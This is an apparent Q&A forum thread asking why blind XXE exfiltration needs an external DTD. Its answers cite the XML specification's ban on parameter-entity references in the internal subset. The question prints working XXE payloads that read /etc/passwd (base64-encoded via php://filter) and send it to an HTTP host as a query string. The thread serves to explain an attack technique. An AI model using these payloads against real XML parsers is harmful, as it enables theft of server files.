# Why do we need External dtd in blind XXE?

Tags: xxe

A proper blind XXE payload is:-

```
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

File stored on http://127.0.0.1/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
```

Now I didn't understand why do we need an External DTD. I have tried to use this below payload as internal dtd.

```
<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtdcall SYSTEM 'file:///etc/passwd' > <!ENTITY % test "<!ENTITY server SYSTEM 'http://192.168.0.3:808/?%dtdcall;'>">%test; ]><r>&server;</r>
```

BUT I got an error:- `PEReferences forbidden in internal subset in blah blah`.

So anyone can explain this?

Answer (score 3):

Finally, after doing a hard search I come to a point **Parameter Entities** are **not** allowed into **Internal DTD subset** i.e.

```
<!DOCTYPE r [ Not allow to set parameteried entity.]
```

If I am wrong then clarify me. I read that on this [XML doc](https://www.w3.org/TR/xml/#wfc-PEinInternalSubset).

Comment: Your findings seem to match this: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

Answer (score 0):

Interaction with an external DTD is required so that you can use nested parameters. In an internal DTD the following is allowed: `<!DOCTYPE alfa [ <!ENTITY bravo "charlie"> ]>` However, in an internal DTD the following is not allowed: `<!DOCTYPE alfa [ <!ENTITY bravo "charlie"> <!ENTITY delta SYSTEM "http://&bravo;.echo.com"> ]>`

The link posted by @act1vand0 tells us this:

> External DTD allows us to include one entity inside the second, but it
> is prohibited in the internal DTD.
> (https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)

The PortSwigger documentation on blind XXE explains it in further detail:

> The preceding technique works fine with an external DTD, but it won't
> normally work with an internal DTD that is fully specified within the
> DOCTYPE element. This is because the technique involves using an XML
> parameter entity within the definition of another parameter entity.
> Per the XML specification, this is permitted in external DTDs but not
> in internal DTDs. (Some parsers might tolerate it, but many do not.) (https://portswigger.net/web-security/xxe/blind)